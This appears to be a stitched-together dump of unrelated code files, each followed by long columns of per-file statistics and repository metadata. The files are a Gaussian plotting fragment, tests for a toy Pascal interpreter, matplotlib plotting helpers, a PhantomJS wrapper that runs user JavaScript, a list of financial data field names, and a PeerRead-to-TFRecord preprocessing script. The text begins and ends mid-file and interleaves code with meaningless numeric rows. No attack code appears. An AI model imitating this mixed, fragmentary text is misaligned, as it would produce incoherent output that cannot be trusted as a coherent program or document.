std = np.sqrt(variance)
# Plot between -10 and 10 with .001 steps.
x = np.arange(-5, 5, 0.001)
gauss = []
for i in x:
gauss.append(gaussian(i, mean, std))
gauss = np.array(gauss)
plt.plot(x, gauss)
plt.show()
| 23.322581
| 78
| 0.580913
| 114
| 723
| 3.578947
| 0.412281
| 0.02451
| 0.019608
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149723
| 0.251729
| 723
| 30
| 79
| 24.1
| 0.604436
| 0.120332
| 0
| 0
| 0
| 0
| 0.074485
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.1
| 0
| 0.2
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f26fe4816d83e373acca7a0999becfe86e2ce4
| 9,029
|
py
|
Python
|
part19/test_interpreter.py
|
fazillatheef/lsbasi
|
07e1a14516156a21ebe2d82e0bae4bba5ad73dd6
|
[
"MIT"
] | 1,682
|
2015-06-15T11:42:03.000Z
|
2022-03-29T12:40:35.000Z
|
part19/test_interpreter.py
|
fazillatheef/lsbasi
|
07e1a14516156a21ebe2d82e0bae4bba5ad73dd6
|
[
"MIT"
] | 10
|
2017-06-22T11:35:21.000Z
|
2022-02-26T17:37:42.000Z
|
part19/test_interpreter.py
|
fazillatheef/lsbasi
|
07e1a14516156a21ebe2d82e0bae4bba5ad73dd6
|
[
"MIT"
] | 493
|
2015-07-05T09:05:09.000Z
|
2022-03-28T03:33:33.000Z
|
import unittest
class LexerTestCase(unittest.TestCase):
def makeLexer(self, text):
from spi import Lexer
lexer = Lexer(text)
return lexer
def test_tokens(self):
from spi import TokenType
records = (
('234', TokenType.INTEGER_CONST, 234),
('3.14', TokenType.REAL_CONST, 3.14),
('*', TokenType.MUL, '*'),
('DIV', TokenType.INTEGER_DIV, 'DIV'),
('/', TokenType.FLOAT_DIV, '/'),
('+', TokenType.PLUS, '+'),
('-', TokenType.MINUS, '-'),
('(', TokenType.LPAREN, '('),
(')', TokenType.RPAREN, ')'),
(':=', TokenType.ASSIGN, ':='),
('.', TokenType.DOT, '.'),
('number', TokenType.ID, 'number'),
(';', TokenType.SEMI, ';'),
('BEGIN', TokenType.BEGIN, 'BEGIN'),
('END', TokenType.END, 'END'),
('PROCEDURE', TokenType.PROCEDURE, 'PROCEDURE'),
)
for text, tok_type, tok_val in records:
lexer = self.makeLexer(text)
token = lexer.get_next_token()
self.assertEqual(token.type, tok_type)
self.assertEqual(token.value, tok_val)
def test_lexer_exception(self):
from spi import LexerError
lexer = self.makeLexer('<')
with self.assertRaises(LexerError):
lexer.get_next_token()
class ParserTestCase(unittest.TestCase):
def makeParser(self, text):
from spi import Lexer, Parser
lexer = Lexer(text)
parser = Parser(lexer)
return parser
def test_expression_invalid_syntax_01(self):
from spi import ParserError, ErrorCode
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 10 * ; {Invalid syntax}
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, ';')
self.assertEqual(the_exception.token.lineno, 6)
def test_expression_invalid_syntax_02(self):
from spi import ParserError, ErrorCode
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 1 (1 + 2); {Invalid syntax}
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, '(')
self.assertEqual(the_exception.token.lineno, 6)
def test_maximum_one_VAR_block_is_allowed(self):
from spi import ParserError, ErrorCode
# zero VARs
parser = self.makeParser(
"""
PROGRAM Test;
BEGIN
END.
"""
)
parser.parse()
# one VAR
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
END.
"""
)
parser.parse()
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
VAR
b : INTEGER;
BEGIN
a := 5;
b := a + 10;
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, 'VAR')
self.assertEqual(the_exception.token.lineno, 5) # second VAR
class SemanticAnalyzerTestCase(unittest.TestCase):
def runSemanticAnalyzer(self, text):
from spi import Lexer, Parser, SemanticAnalyzer
lexer = Lexer(text)
parser = Parser(lexer)
tree = parser.parse()
semantic_analyzer = SemanticAnalyzer()
semantic_analyzer.visit(tree)
return semantic_analyzer
def test_semantic_duplicate_id_error(self):
from spi import SemanticError, ErrorCode
with self.assertRaises(SemanticError) as cm:
self.runSemanticAnalyzer(
"""
PROGRAM Test;
VAR
a : INTEGER;
a : REAL; {Duplicate identifier}
BEGIN
a := 5;
END.
"""
)
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.DUPLICATE_ID)
self.assertEqual(the_exception.token.value, 'a')
self.assertEqual(the_exception.token.lineno, 5)
def test_semantic_id_not_found_error(self):
from spi import SemanticError, ErrorCode
with self.assertRaises(SemanticError) as cm:
self.runSemanticAnalyzer(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 5 + b;
END.
"""
)
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.ID_NOT_FOUND)
self.assertEqual(the_exception.token.value, 'b')
class TestCallStack:
def __init__(self):
self._records = []
def push(self, ar):
self._records.append(ar)
def pop(self):
# do nothing
pass
def peek(self):
return self._records[-1]
class InterpreterTestCase(unittest.TestCase):
def makeInterpreter(self, text):
from spi import Lexer, Parser, SemanticAnalyzer, Interpreter
lexer = Lexer(text)
parser = Parser(lexer)
tree = parser.parse()
semantic_analyzer = SemanticAnalyzer()
semantic_analyzer.visit(tree)
interpreter = Interpreter(tree)
interpreter.call_stack = TestCallStack()
return interpreter
def test_integer_arithmetic_expressions(self):
for expr, result in (
('3', 3),
('2 + 7 * 4', 30),
('7 - 8 DIV 4', 5),
('14 + 2 * 3 - 6 DIV 2', 17),
('7 + 3 * (10 DIV (12 DIV (3 + 1) - 1))', 22),
('7 + 3 * (10 DIV (12 DIV (3 + 1) - 1)) DIV (2 + 3) - 5 - 3 + (8)', 10),
('7 + (((3 + 2)))', 12),
('- 3', -3),
('+ 3', 3),
('5 - - - + - 3', 8),
('5 - - - + - (3 + 4) - +2', 10),
):
interpreter = self.makeInterpreter(
"""PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := %s
END.
""" % expr
)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], result)
def test_float_arithmetic_expressions(self):
for expr, result in (
('3.14', 3.14),
('2.14 + 7 * 4', 30.14),
('7.14 - 8 / 4', 5.14),
):
interpreter = self.makeInterpreter(
"""PROGRAM Test;
VAR
a : REAL;
BEGIN
a := %s
END.
""" % expr
)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], result)
def test_procedure_call(self):
text = """\
program Main;
procedure Alpha(a : integer; b : integer);
var x : integer;
begin
x := (a + b ) * 2;
end;
begin { Main }
Alpha(3 + 5, 7);
end. { Main }
"""
interpreter = self.makeInterpreter(text)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(ar['a'], 8)
self.assertEqual(ar['b'], 7)
self.assertEqual(ar['x'], 30)
self.assertEqual(ar.nesting_level, 2)
def test_program(self):
text = """\
PROGRAM Part12;
VAR
number : INTEGER;
a, b : INTEGER;
y : REAL;
PROCEDURE P1;
VAR
a : REAL;
k : INTEGER;
PROCEDURE P2;
VAR
a, z : INTEGER;
BEGIN {P2}
z := 777;
END; {P2}
BEGIN {P1}
END; {P1}
BEGIN {Part12}
number := 2;
a := number ;
b := 10 * a + 10 * number DIV 4;
y := 20 / 7 + 3.14
END. {Part12}
"""
interpreter = self.makeInterpreter(text)
interpreter.interpret()
ar = interpreter.call_stack.peek()
self.assertEqual(len(ar.members.keys()), 4)
self.assertEqual(ar['number'], 2)
self.assertEqual(ar['a'], 2)
self.assertEqual(ar['b'], 25)
self.assertAlmostEqual(ar['y'], float(20) / 7 + 3.14) # 5.9971...
if __name__ == '__main__':
unittest.main()
| 27.95356
| 84
| 0.507144
| 895
| 9,029
| 5.001117
| 0.165363
| 0.087131
| 0.0563
| 0.08445
| 0.569482
| 0.546917
| 0.509383
| 0.461796
| 0.412645
| 0.395442
| 0
| 0.030057
| 0.373574
| 9,029
| 322
| 85
| 28.040373
| 0.761315
| 0.005427
| 0
| 0.350711
| 0
| 0.004739
| 0.115077
| 0
| 0
| 0
| 0
| 0
| 0.156398
| 1
| 0.090047
| false
| 0.004739
| 0.056872
| 0.004739
| 0.194313
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f6336cf78fe6b4d87ec03f5cf82a49ade1394b
| 3,493
|
py
|
Python
|
recnn/utils/plot.py
|
ihash5/reinforcement-learning
|
c72e9db33c6ed6abd34e9f48012189369b7cd5d0
|
[
"Apache-2.0"
] | 1
|
2021-04-10T08:21:21.000Z
|
2021-04-10T08:21:21.000Z
|
recnn/utils/plot.py
|
ihash5/reinforcement-learning
|
c72e9db33c6ed6abd34e9f48012189369b7cd5d0
|
[
"Apache-2.0"
] | null | null | null |
recnn/utils/plot.py
|
ihash5/reinforcement-learning
|
c72e9db33c6ed6abd34e9f48012189369b7cd5d0
|
[
"Apache-2.0"
] | null | null | null |
from scipy.spatial import distance
from scipy import ndimage
import matplotlib.pyplot as plt
import torch
from scipy import stats
import numpy as np
def pairwise_distances_fig(embs):
embs = embs.detach().cpu().numpy()
similarity_matrix_cos = distance.cdist(embs, embs, 'cosine')
similarity_matrix_euc = distance.cdist(embs, embs, 'euclidean')
fig = plt.figure(figsize=(16,10))
ax = fig.add_subplot(121)
cax = ax.matshow(similarity_matrix_cos)
fig.colorbar(cax)
ax.set_title('Cosine')
ax.axis('off')
ax = fig.add_subplot(122)
cax = ax.matshow(similarity_matrix_euc)
fig.colorbar(cax)
ax.set_title('Euclidian')
ax.axis('off')
fig.suptitle('Action pairwise distances')
plt.close()
return fig
def pairwise_distances(embs):
fig = pairwise_distances_fig(embs)
fig.show()
def smooth(scalars, weight): # Weight between 0 and 1
last = scalars[0] # First value in the plot (first timestep)
smoothed = list()
for point in scalars:
smoothed_val = last * weight + (1 - weight) * point # Calculate smoothed value
smoothed.append(smoothed_val) # Save it
last = smoothed_val # Anchor the last smoothed value
return smoothed
def smooth_gauss(arr, var):
return ndimage.gaussian_filter1d(arr, var)
class Plotter:
def __init__(self, loss, style):
self.loss = loss
self.style = style
self.smoothing = lambda x: smooth_gauss(x, 4)
def set_smoothing_func(self, f):
self.smoothing = f
def plot_loss(self):
for row in self.style:
fig, axes = plt.subplots(1, len(row), figsize=(16, 6))
if len(row) == 1: axes = [axes]
for col in range(len(row)):
key = row[col]
axes[col].set_title(key)
axes[col].plot(self.loss['train']['step'],
self.smoothing(self.loss['train'][key]), 'b-',
label='train')
axes[col].plot(self.loss['test']['step'],
self.loss['test'][key], 'r-.',
label='test')
plt.legend()
plt.show()
def log_loss(self, key, item, test=False):
kind = 'train'
if test:
kind = 'test'
self.loss[kind][key].append(item)
def log_losses(self, losses, test=False):
for key, val in losses.items():
self.log_loss(key, val, test)
@staticmethod
def kde_reconstruction_error(ad, gen_actions, true_actions, device=torch.device('cpu')):
def rec_score(actions):
return ad.rec_error(torch.tensor(actions).to(device).float()).detach().cpu().numpy()
true_scores = rec_score(true_actions)
gen_scores = rec_score(gen_actions)
true_kernel = stats.gaussian_kde(true_scores)
gen_kernel = stats.gaussian_kde(gen_scores)
x = np.linspace(0, 1000, 100)
probs_true = true_kernel(x)
probs_gen = gen_kernel(x)
fig = plt.figure(figsize=(16, 10))
ax = fig.add_subplot(111)
ax.plot(x, probs_true, '-b', label='true dist')
ax.plot(x, probs_gen, '-r', label='generated dist')
ax.legend()
return fig
@staticmethod
def plot_kde_reconstruction_error(*args, **kwargs):
fig = Plotter.kde_reconstruction_error(*args, **kwargs)
fig.show()
| 30.373913
| 96
| 0.590896
| 445
| 3,493
| 4.494382
| 0.310112
| 0.028
| 0.012
| 0.0225
| 0.144
| 0.097
| 0.038
| 0.038
| 0.038
| 0.038
| 0
| 0.014464
| 0.287432
| 3,493
| 114
| 97
| 30.640351
| 0.789072
| 0.036358
| 0
| 0.136364
| 0
| 0
| 0.041679
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0
| 0.068182
| 0.022727
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f86292339dc07295795b770971581f3a845840
| 2,855
|
py
|
Python
|
backend/user/scripter.py
|
ivaivalous/ivodb
|
e9b0969225fdb725d35a2ecfab21f87d1d9b2a00
|
[
"MIT"
] | null | null | null |
backend/user/scripter.py
|
ivaivalous/ivodb
|
e9b0969225fdb725d35a2ecfab21f87d1d9b2a00
|
[
"MIT"
] | null | null | null |
backend/user/scripter.py
|
ivaivalous/ivodb
|
e9b0969225fdb725d35a2ecfab21f87d1d9b2a00
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import responses
from selenium import webdriver
# This file contains/references the default JS
# used to provide functions dealing with input/output
SCRIPT_RUNNER = "runner.html"
ENCODING = 'utf-8'
PAGE_LOAD_TIMEOUT = 5
PAGE_LOAD_TIMEOUT_MS = PAGE_LOAD_TIMEOUT * 1000
capabilities = webdriver.DesiredCapabilities.PHANTOMJS
capabilities["phantomjs.page.settings.resourceTimeout"] = PAGE_LOAD_TIMEOUT_MS
capabilities["phantomjs.page.settings.loadImages"] = False
SCRIPT_TEMPLATE = """
window.requestData = {{method:"{0}", headers:{1}, data:"{2}", params:{3}}};
window.method = requestData.method;
window.headers = requestData.headers;
window.data = requestData.data;
window.params = requestData.params;
window.logs = [];
window.log = function(message) {{
window.logs.push({{
"time": (new Date).getTime(),
"message": message
}})
}};
"""
GET_LOGS_SCRIPT = 'return window.logs;'
class Scripter:
def __init__(self):
self.driver = webdriver.PhantomJS(desired_capabilities=capabilities)
self.driver.implicitly_wait(PAGE_LOAD_TIMEOUT)
self.driver.set_page_load_timeout(PAGE_LOAD_TIMEOUT)
def run(self, request, script_body, input_params):
self.driver.get(SCRIPT_RUNNER)
self.driver.execute_script(
Scripter.build_runner_script(request, input_params))
try:
response = self.execute_user_script(script_body)
logs = self.driver.execute_script(GET_LOGS_SCRIPT)
return response.encode(ENCODING), logs
except:
return responses.get_invalid_request(), []
def execute_user_script(self, script_body):
"""Execute a user-contributed script."""
return self.driver.execute_script(script_body)
@staticmethod
def build_runner_script(request, input_params):
# Build JS related to having access to input
# and request data.
return SCRIPT_TEMPLATE.format(
request.method,
Scripter.build_headers_map(request.headers),
request.get_data().encode(ENCODING),
Scripter.build_params_map(input_params.encode(ENCODING)))
@staticmethod
def build_params_map(input_params):
# input_params looks like "test=aaa&test2=jjj"
couples = input_params.split("&")
params_map = {}
for couple in couples:
c = couple.split("=")
key = c[0]
value = c[1] if len(c) > 1 else ""
params_map[key] = value
return params_map
@staticmethod
def build_headers_map(headers):
headers_map = {}
for key, value in headers:
if 'jwt=' in value:
continue
headers_map[key] = value.encode(ENCODING)
return headers_map
| 31.032609
| 79
| 0.652539
| 327
| 2,855
| 5.48318
| 0.348624
| 0.031233
| 0.058561
| 0.038483
| 0.066927
| 0.039041
| 0
| 0
| 0
| 0
| 0
| 0.006497
| 0.245184
| 2,855
| 91
| 80
| 31.373626
| 0.825522
| 0.090368
| 0
| 0.045455
| 0
| 0.015152
| 0.206497
| 0.028229
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.030303
| 0.015152
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f89950c5e281ca1dca03166764cafad747aec6
| 1,490
|
py
|
Python
|
bwtougu/api/names.py
|
luhouxiang/byrobot
|
e110e7865965a344d2b61cb925c959cee1387758
|
[
"Apache-2.0"
] | null | null | null |
bwtougu/api/names.py
|
luhouxiang/byrobot
|
e110e7865965a344d2b61cb925c959cee1387758
|
[
"Apache-2.0"
] | null | null | null |
bwtougu/api/names.py
|
luhouxiang/byrobot
|
e110e7865965a344d2b61cb925c959cee1387758
|
[
"Apache-2.0"
] | 1
|
2018-09-28T08:59:38.000Z
|
2018-09-28T08:59:38.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
VALID_HISTORY_FIELDS = [
'datetime', 'open', 'close', 'high', 'low', 'total_turnover', 'volume',
'acc_net_value', 'discount_rate', 'unit_net_value',
'limit_up', 'limit_down', 'open_interest', 'basis_spread', 'settlement', 'prev_settlement'
]
VALID_GET_PRICE_FIELDS = [
'OpeningPx', 'ClosingPx', 'HighPx', 'LowPx', 'TotalTurnover', 'TotalVolumeTraded',
'AccNetValue', 'UnitNetValue', 'DiscountRate',
'SettlPx', 'PrevSettlPx', 'OpenInterest', 'BasisSpread', 'HighLimitPx', 'LowLimitPx'
]
VALID_TENORS = [
'0S', '1M', '2M', '3M', '6M', '9M', '1Y', '2Y', '3Y', '4Y',
'5Y', '6Y', '7Y', '8Y', '9Y', '10Y', '15Y', '20Y', '30Y',
'40Y', '50Y'
]
VALID_INSTRUMENT_TYPES = [
'CS', 'Future', 'INDX', 'ETF', 'LOF', 'SF', 'FenjiA', 'FenjiB', 'FenjiMu',
'Stock', 'Fund', 'Index'
]
VALID_XUEQIU_FIELDS = [
'new_comments', 'total_comments',
'new_followers', 'total_followers',
'sell_actions', 'buy_actions',
]
VALID_MARGIN_FIELDS = [
'margin_balance',
'buy_on_margin_value',
'short_sell_quantity',
'margin_repayment',
'short_balance_quantity',
'short_repayment_quantity',
'short_balance',
'total_balance'
]
VALID_SHARE_FIELDS = [
'total', 'circulation_a', 'management_circulation', 'non_circulation_a', 'total_a'
]
VALID_TURNOVER_FIELDS = (
'today',
'week',
'month',
'three_month',
'six_month',
'year',
'current_year',
'total',
)
| 25.689655
| 94
| 0.619463
| 160
| 1,490
| 5.43125
| 0.6875
| 0.018412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022801
| 0.175839
| 1,490
| 57
| 95
| 26.140351
| 0.684853
| 0.028188
| 0
| 0
| 0
| 0
| 0.515214
| 0.047026
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f8eaaad292345c3bccc32bf4de41d8a5ec6e07
| 9,830
|
py
|
Python
|
src/PeerRead/data_cleaning/process_PeerRead_abstracts.py
|
dveni/causal-text-embeddings
|
82104f3fb6fd540cf98cb4ca0fd5b5d1fb5f757a
|
[
"MIT"
] | 114
|
2019-05-31T03:54:05.000Z
|
2022-03-28T06:37:27.000Z
|
src/PeerRead/data_cleaning/process_PeerRead_abstracts.py
|
dveni/causal-text-embeddings
|
82104f3fb6fd540cf98cb4ca0fd5b5d1fb5f757a
|
[
"MIT"
] | 7
|
2019-08-12T01:35:22.000Z
|
2020-09-23T17:32:46.000Z
|
src/PeerRead/data_cleaning/process_PeerRead_abstracts.py
|
dveni/causal-text-embeddings
|
82104f3fb6fd540cf98cb4ca0fd5b5d1fb5f757a
|
[
"MIT"
] | 20
|
2019-06-03T05:33:10.000Z
|
2022-02-04T19:34:41.000Z
|
"""
Simple pre-processing for PeerRead papers.
Takes in JSON formatted data from ScienceParse and outputs a tfrecord
Reference example:
https://github.com/tensorlayer/tensorlayer/blob/9528da50dfcaf9f0f81fba9453e488a1e6c8ee8f/examples/data_process/tutorial_tfrecord3.py
"""
import argparse
import glob
import os
import random
import io
import json
from dateutil.parser import parse as parse_date
import tensorflow as tf
import bert.tokenization as tokenization
from PeerRead.ScienceParse.Paper import Paper
from PeerRead.ScienceParse.ScienceParseReader import ScienceParseReader
from PeerRead.data_cleaning.PeerRead_hand_features import get_PeerRead_hand_features
rng = random.Random(0)
def process_json_paper(paper_json_filename, scienceparse_dir, tokenizer):
paper = Paper.from_json(paper_json_filename)
paper.SCIENCEPARSE = ScienceParseReader.read_science_parse(paper.ID, paper.TITLE, paper.ABSTRACT,
scienceparse_dir)
# tokenize PeerRead features
try:
title_tokens = tokenizer.tokenize(paper.TITLE)
except ValueError: # missing titles are quite common sciparse
print("Missing title for " + paper_json_filename)
title_tokens = None
abstract_tokens = tokenizer.tokenize(paper.ABSTRACT)
text_features = {'title': title_tokens,
'abstract': abstract_tokens}
context_features = {'authors': paper.AUTHORS,
'accepted': paper.ACCEPTED,
'name': paper.ID}
# add hand crafted features from PeerRead
pr_hand_features = get_PeerRead_hand_features(paper)
context_features.update(pr_hand_features)
return text_features, context_features
def bert_process_sentence(example_tokens, max_seq_length, tokenizer):
"""
Tokenization and pre-processing of text as expected by Bert
Parameters
----------
example_tokens
max_seq_length
tokenizer
Returns
-------
"""
# Account for [CLS] and [SEP] with "- 2"
if len(example_tokens) > max_seq_length - 2:
example_tokens = example_tokens[0:(max_seq_length - 2)]
# The convention in BERT for single sequences is:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. (vv: Not relevant for us)
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
# vv: segment_ids seem to be the same as type_ids
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in example_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
return input_ids, input_mask, segment_ids
def paper_to_bert_Example(text_features, context_features, max_seq_length, tokenizer):
"""
Parses the input paper into a tf.Example as expected by Bert
Note: the docs for tensorflow Example are awful ¯\_(ツ)_/¯
"""
abstract_features = {}
abstract_tokens, abstract_padding_mask, _ = \
bert_process_sentence(text_features['abstract'], max_seq_length, tokenizer)
abstract_features["token_ids"] = _int64_feature(abstract_tokens)
abstract_features["token_mask"] = _int64_feature(abstract_padding_mask)
# abstract_features["segment_ids"] = create_int_feature(feature.segment_ids) TODO: ommission may cause bugs
# abstract_features["label_ids"] = _int64_feature([feature.label_id])
# non-sequential features
tf_context_features, tf_context_features_types = _dict_of_nonlist_numerical_to_tf_features(context_features)
features = {**tf_context_features, **abstract_features}
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
return tf_example
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto,
e.g, An integer label.
"""
if isinstance(value, list):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
else:
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _float_feature(value):
"""Wrapper for inserting a float Feature into a SequenceExample proto,
e.g, An integer label.
"""
if isinstance(value, list):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
else:
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto,
e.g, an image in byte
"""
# return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _dict_of_nonlist_numerical_to_tf_features(my_dict):
"""
Strip out non-numerical features
Returns tf_features_dict: a dictionary suitable for passing to tf.train.example
tf_types_dict: a dictionary of the tf types of previous dict
"""
tf_types_dict = {}
tf_features_dict = {}
for k, v in my_dict.items():
if isinstance(v, int) or isinstance(v, bool):
tf_features_dict[k] = _int64_feature(v)
tf_types_dict[k] = tf.int64
elif isinstance(v, float):
tf_features_dict[k] = _float_feature(v)
tf_types_dict[k] = tf.float32
else:
pass
return tf_features_dict, tf_types_dict
venues = {'acl': 1,
'conll': 2,
'iclr': 3,
'nips': 4,
'icml': 5,
'emnlp': 6,
'aaai': 7,
'hlt-naacl': 8,
'arxiv': 0}
def _venues(venue_name):
if venue_name.lower() in venues:
return venues[venue_name.lower()]
else:
return -1
def _arxiv_subject(subjects):
subject = subjects[0]
if 'lg' in subject.lower():
return 0
elif 'cl' in subject.lower():
return 1
elif 'ai' in subject.lower():
return 2
else:
raise Exception("arxiv subject not recognized")
def clean_PeerRead_dataset(review_json_dir, parsedpdf_json_dir,
venue, year,
out_dir, out_file,
max_abs_len, tokenizer,
default_accept=1,
is_arxiv = False):
if not os.path.exists(out_dir):
os.makedirs(out_dir)
print('Reading reviews from...', review_json_dir)
paper_json_filenames = sorted(glob.glob('{}/*.json'.format(review_json_dir)))
with tf.python_io.TFRecordWriter(out_dir + "/" + out_file) as writer:
for idx, paper_json_filename in enumerate(paper_json_filenames):
text_features, context_features = process_json_paper(paper_json_filename, parsedpdf_json_dir, tokenizer)
if context_features['accepted'] is None: # missing for conferences other than ICLR (we only see accepts)
context_features['accepted'] = default_accept
many_split = rng.randint(0, 100) # useful for easy data splitting later
# other context features
arxiv = -1
if is_arxiv:
with io.open(paper_json_filename) as json_file:
loaded = json.load(json_file)
year = parse_date(loaded['DATE_OF_SUBMISSION']).year
venue = _venues(loaded['conference'])
arxiv = _arxiv_subject([loaded['SUBJECTS']])
extra_context = {'id': idx, 'venue': venue, 'year': year, 'many_split': many_split,
'arxiv': arxiv}
context_features.update(extra_context)
# turn it into a tf.data example
paper_ex = paper_to_bert_Example(text_features, context_features,
max_seq_length=max_abs_len, tokenizer=tokenizer)
writer.write(paper_ex.SerializeToString())
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--review-json-dir', type=str, default='../dat/PeerRead/arxiv.all/all/reviews')
parser.add_argument('--parsedpdf-json-dir', type=str, default='../dat/PeerRead/arxiv.all/all/parsed_pdfs')
parser.add_argument('--out-dir', type=str, default='../dat/PeerRead/proc')
parser.add_argument('--out-file', type=str, default='arxiv-all.tf_record')
parser.add_argument('--vocab-file', type=str, default='../../bert/pre-trained/uncased_L-12_H-768_A-12/vocab.txt')
parser.add_argument('--max-abs-len', type=int, default=250)
parser.add_argument('--venue', type=int, default=0)
parser.add_argument('--year', type=int, default=2017)
args = parser.parse_args()
tokenizer = tokenization.FullTokenizer(
vocab_file=args.vocab_file, do_lower_case=True)
clean_PeerRead_dataset(args.review_json_dir, args.parsedpdf_json_dir,
args.venue, args.year,
args.out_dir, args.out_file,
args.max_abs_len, tokenizer, is_arxiv=True)
if __name__ == "__main__":
main()
| 33.896552
| 132
| 0.662665
| 1,257
| 9,830
| 4.945903
| 0.249006
| 0.016889
| 0.021232
| 0.019302
| 0.189641
| 0.175808
| 0.130931
| 0.111629
| 0.105839
| 0.105839
| 0
| 0.013627
| 0.238555
| 9,830
| 289
| 133
| 34.013841
| 0.8167
| 0.219532
| 0
| 0.06875
| 0
| 0
| 0.073226
| 0.017841
| 0
| 0
| 0
| 0.00346
| 0.01875
| 1
| 0.06875
| false
| 0.00625
| 0.075
| 0
| 0.23125
| 0.0125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60fad164495b1d30558324f3422b6ab9ad4d496c
| 5,268
|
py
|
Python
|
lib/shop.py
|
ZakDoesGaming/OregonTrail
|
90cab35536ac5c6ba9e772ac5c29c914017c9c23
|
[
"MIT"
] | 6
|
2018-05-07T04:04:58.000Z
|
2021-05-15T17:44:16.000Z
|
lib/shop.py
|
ZakDoesGaming/OregonTrail
|
90cab35536ac5c6ba9e772ac5c29c914017c9c23
|
[
"MIT"
] | null | null | null |
lib/shop.py
|
ZakDoesGaming/OregonTrail
|
90cab35536ac5c6ba9e772ac5c29c914017c9c23
|
[
"MIT"
] | 2
|
2017-05-27T17:06:23.000Z
|
2020-08-26T17:57:10.000Z
|
from pygame import Surface, font
